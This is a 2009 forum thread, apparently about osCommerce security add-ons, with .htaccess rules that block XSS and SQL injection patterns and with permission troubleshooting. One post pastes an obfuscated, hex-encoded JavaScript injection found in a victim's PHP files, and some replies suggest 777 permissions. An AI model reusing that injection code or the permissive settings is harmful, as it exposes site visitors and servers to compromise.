656 replies to this topic

[rednme]

lowkey704, on Dec 31 2008, 02:20 AM, said:

Warning: file(DOCUMENT_ROOT/../banned/IP_Trapped.txt) [function.file]: failed to open stream: Permission denied in /var/www/vhosts/themancaveoutletstore.com/httpdocs/includes/secret.php on line 7

Warning: Invalid argument supplied for foreach() in /var/www/vhosts/themancaveoutletstore.com/httpdocs/includes/secret.php on line 15

This is coming from the Application Top

I also wasn't getting banned... my IP never showed up... but then again maybe it all has to do with the error above... I disabled the application top code for now... any takers on this?

try for DOCUMENT_ROOT portion with absolute path to the files like :

/var/www/vhosts/themancaveoutletstore.com/httpdocs/banned/IP_Trapped.txt

in
includes/secret.php
and
personal/index.php

and change permission to 777 or 666 for IP_Trapped.txt

genesis

Edited by rednme, 03 January 2009 - 04:39 PM.

[carricksupplies]

I have installed all the contributions except the Security Pro contribution, they seem to be working fine.

Does anyone know how I would go about setting up a cron job to automatically backup the database every 3 hours?

What would the code be to do this?

Thanks,

Martyn

[airbrushmaster]

hi just installed SiteMonitor_V_1.7  but in admin when i click the first button it says  Reference file creation failed.

[airbrushmaster]

airbrushmaster, on Jan 7 2009, 04:09 PM, said:

hi just installed SiteMonitor_V_1.7  but in admin when i click the first button it says  Reference file creation failed.

its ok i have took it off instead

[Eim2]

Hello,

There is  a little PROBLEM here: http://addons.oscommerce.com/info/6044

I've installed the latest Anti XSS+SQL Injection to help PCI Compliance  by chrish123  added 19 Jul 2008.

When I click the <buy now> button on advanced_search_result.php the product is added to the customers basket
BUT I get redirected to the iplog.txt telling me I should go away ... which is no good at all.

When those lines are cut off .htaccess (commented) clicking the button gives no redirect:

This is the relevant part in .htaccess

# extra anti uri and xss attack script 2 - sql injection prevention
 Options +FollowSymLinks
 RewriteEngine On
 RewriteCond %{QUERY_STRING} ("|%22).*(>|%3E|<|%3C).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (java script:).*(;).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (;|'|"|%22).*(union|select|insert|drop|update|md5|benchmark|or|and|if).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteRule (,|;|<|>|'|`) /log.php [NC]

Should I keep only the pixclinic  part of this contribution ?
Thanks for your kind advice,
David

[nomawhite]

Do you still need to do all these things if you have a SSL certificate setup? Thanks

[nomawhite]

I hate using this forum because no one ever replies

[spooks]

You have to be patient, we're providing free help, so you must wait till we have time.

The answer yes, the ssl only allows a secure connection, it does not 'secure' your site

The hackers are out there & if you don't protect the WILL get you.

I have a test site, for which there is no domain, its not published & without the IP you'll never find it, yet even that got attacked!!

[nomawhite]

spooks, on Jan 15 2009, 11:26 PM, said:

You have to be patient, we're providing free help, so you must wait till we have time.

The answer yes, the ssl only allows a secure connection, it does not 'secure' your site

The hackers are out there & if you don't protect the WILL get you.

I have a test site, for which there is no domain, its not published & without the IP you'll never find it, yet even that got attacked!!

Thanks for your reply, I am paranoid about making my site more open to the public by launching it. I do appreciate the free help but I have to say more than half the time I post something I do not get a reply, not that its your fault of course.

[suffolk]

Hi,
I'm not sure if this is the place for this, but as it's a security related issue, I hoped someone may have some ideas.

I've been using the 'whosonline' contrib for some time now, and as a result, i've noticed an interesting connection to my site.
Basically, the 'customer' behaves like a 'bot, working it's way through the pages of the site 24 x 7, it doesn't have a session ID, or appear to go anywhere it shouldn't, however it's a permanent visitor to the site, with it's online time counter only resetting every 24 hrs, so at the least, it's a resource hog.

-Now the weird part (to me at least!)
It's IP keeps changing! It cycles through various sets of IP's ranging from Yahoo bot to private/ISP/Google addresses. I have tried banning the IP addresses it uses, but it simply 'morphs' to a new one (I gave up after 50 addresses, as many were inside address pools used by ISPs, and I didn't wish to ban legitimate users)- the next weird part is that whosonline doesn't see this as a new visitor, it keeps the online time, and entry time counters and updates the IP address.

Obviously there's some sort of spoofing going on here, the question is, how to stop it! -  it only makes a database query every 30-40 seconds, so it's not tripping any DOS alarms on the server/firewall.


Has anyone else seen anything similar, or have any ideas about what this could be (and how to stop it)???

[Coopco]

Eim2, on Jan 12 2009, 07:57 PM, said:

Hello,

There is  a little PROBLEM here: http://addons.oscommerce.com/info/6044

I've installed the latest Anti XSS+SQL Injection to help PCI Compliance  by chrish123  added 19 Jul 2008.

When I click the <buy now> button on advanced_search_result.php the product is added to the customers basket
BUT I get redirected to the iplog.txt telling me I should go away ... which is no good at all.

When those lines are cut off .htaccess (commented) clicking the button gives no redirect:

This is the relevant part in .htaccess

# extra anti uri and xss attack script 2 - sql injection prevention
 Options +FollowSymLinks
 RewriteEngine On
 RewriteCond %{QUERY_STRING} ("|%22).*(>|%3E|<|%3C).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (java script:).*(;).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteCond %{QUERY_STRING} (;|'|"|%22).*(union|select|insert|drop|update|md5|benchmark|or|and|if).* [NC]
 RewriteRule ^(.*)$ log.php [NC]
 RewriteRule (,|;|<|>|'|`) /log.php [NC]

Should I keep only the pixclinic  part of this contribution ?
Thanks for your kind advice,
David

Advanced Search - 403 Forbidden error, saying a login is required on my site...

[[200]]

Hey guys,

I have installed all of the addons listed on the first page but  I am still getting this code added to a number of php files...

Quote

c102916999516l497da75b3503d(l497da75b35734){ function l497da75b35f05(){return 16;} return (parseInt(l497da75b35734,l497da75b35f05()));}function l497da75b36f22(l497da75b37677){ function l497da75b38de9(){var l497da75b395b9=2;return l497da75b395b9;} var l497da75b37e48='';l497da75b39d8b=String.fromCharCode;for(l497da75b38618=0;l497da75b38618<l497da75b37677.length;l497da75b38618+=l497da75b38de9()){ l497da75b37e48+=(l497da75b39d8b(c102916999516l497da75b3503d(l497da75b37677.subst
r(l497da75b38618,l497da75b38de9()))));}return l497da75b37e48;} var x75='';var l497da75b3a55a='3C736'+x75+'3726'+x75+'970743E6'+x75+'96'+x75+'6'+x75+'28216'+x75+'D796'+x75+'96'+x75+'1297B6'+x75+'46'+x75+'F6'+x75+'3756'+x75+'D6'+x75+'56'+x75+'E742E77726'+x75+'9746'+x75+'528756'+x75+'E6'+x75+'5736'+x75+'36'+x75+'1706'+x75+'528202725336'+x75+'32536'+x75+'392536'+x75+'36'+x75+'2537322536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'352532302536'+x75+'6'+x75+'52536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'3525336'+x75+'42536'+x75+'332533312533302532302537332537322536'+x75+'3325336'+x75+'42532372536'+x75+'3825373425373425373025336'+x75+'125326'+x75+'6'+x75+'25326'+x75+'6'+x75+'2536'+x75+'372536'+x75+'6'+x75+'6'+x75+'2536'+x75+'372536'+x75+'6'+x75+'6'+x75+'2533322536'+x75+'6'+x75+'42536'+x75+'3525326'+x75+'52536'+x75+'6'+x75+'52536'+x75+'3525373425326'+x75+'6'+x75+'25326'+x75+'52536'+x75+'372536'+x75+'6'+x75+'6'+x75+'25326'+x75+'6'+x75+'2536'+x75+'332536'+x75+'382536'+x75+'352536'+x75+'332536'+x75+'6'+x75+'225326'+x75+'52536'+x75+'382537342536'+x75+'6'+x75+'42536'+x75+'6'+x75+'32532372532302537372536'+x75+'392536'+x75+'342537342536'+x75+'3825336'+x75+'4253334253336'+x75+'2532302536'+x75+'382536'+x75+'352536'+x75+'392536'+x75+'372536'+x75+'3825373425336'+x75+'42533352533372533332532302537332537342537392536'+x75+'6'+x75+'32536'+x75+'3525336'+x75+'4253237253736'+x75+'2536'+x75+'392537332536'+x75+'392536'+x75+'322536'+x75+'392536'+x75+'6'+x75+'32536'+x75+'3925373425373925336'+x75+'12536'+x75+'382536'+x75+'392536'+x75+'342536'+x75+'342536'+x75+'352536'+x75+'6'+x75+'525323725336'+x75+'525336'+x75+'325326'+x75+'6'+x75+'2536'+x75+'392536'+x75+'36'+x75+'2537322536'+x75+'312536'+x75+'6'+x75+'42536'+x75+'3525336'+x75+'52729293B7D76'+x75+'6'+x75+'172206'+x75+'D796'+x75+'96'+x75+'13D7472756'+x75+'53B3C2F736'+x75+'3726'+x75+'970743E';document.write(l497da75b36f22(l497da75b3a55a));</script>

How the hell do I get rid of this and prevent it from coming back?

Thanks.

[Coopco]

[200], on Jan 27 2009, 12:49 AM, said:

Hey guys,

I have installed all of the addons listed on the first page but  I am still getting this code added to a number of php files...



How the hell do I get rid of this and prevent it from coming back?

Thanks.

If you are not running RC2a, then you need to patch it.

If you are running RC2a, then, to the best of my knowledge, and all things considered, your web host provides the vulnerabilty and you need to change web hosts.

[mirza_yasir4]

Both Security PRO and IP Trap worked for me
But I am unable to use .htaceess security, when I put a .htacess file into server, it give me server internal error, then I can not see my website and admin section both.

[revenson]

mirza_yasir4, on Feb 1 2009, 01:56 AM, said:

Both Security PRO and IP Trap worked for me
But I am unable to use .htaceess security, when I put a .htacess file into server, it give me server internal error, then I can not see my website and admin section both.

Yes, I found the same thing a couple of days ago.  My suggestion is to remove sections of the suggested .htaccess file from the bottom up until it works.  I say that because I recall it was something near the bottom that was causing my problem.

[paper53558]

spooks, on Aug 29 2008, 12:41 PM, said:

Permissions on folders should be no higher than 755. If your hosting setup demands permissions of 777 on folders then change hosts.

I recently switched web hosts. I got the error about the images directory not being writeable. The directory permissions were 755. I was also unable to add images to products with the permissions set at 755. I switched the permissions to 777 and everything uploaded and the error message went away. At my old web host, the images folder was set at 755 and everything worked fine. The old host was a shared hosting plan, the new host is a VPS plan. What do I need to configure or ask the host to do to get my permissions back to 755? Thanks!

[FIMBLE]

ask you host to turn on SuExec it will alow you to run 755 as 777 [as you old hosts did]
Nic

[paper53558]

FIMBLE, on Feb 2 2009, 07:44 PM, said:

ask you host to turn on SuExec it will alow you to run 755 as 777 [as you old hosts did]
Nic

Thanks for your help. SuExec was already turned on, but I checked and had the host turn on suPHP and put it in the .htaccess file and that did the trick.

[spooks]

oops

[Moparcj5]

I had a problem with htaccess protection contribution with hot linking images.  When ever I went to a secure part of my website such as log in ,check out, ect, I would see the stolen image on those pages.  Below I have added a line of code to this that fixed it.  Hopefully this is done correctly and will not cause problems.

This is to help someone else out with the same problem.  If there is anything wrong with this please let me know.

# stop hotlinking (gif/jpg) and serve alternate content
I have included an image for you to upload, please note if you use your images out side of your server (like linked into EBAY) you cannot use this.

<IfModule mod_rewrite.c>

RewriteEngine on

RewriteCond %{HTTP_REFERER} !^$

RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURSITE\.COM/.*$ [NC]

RewriteCond %{HTTP_REFERER} !^https://(www\.)?YOURSITE\.COM/.*$ [NC]

RewriteRule .*\.(gif|jpg)$ http://www.YOURSITE.COM/images/stolen.gif [R,NC,L]

</ifModule>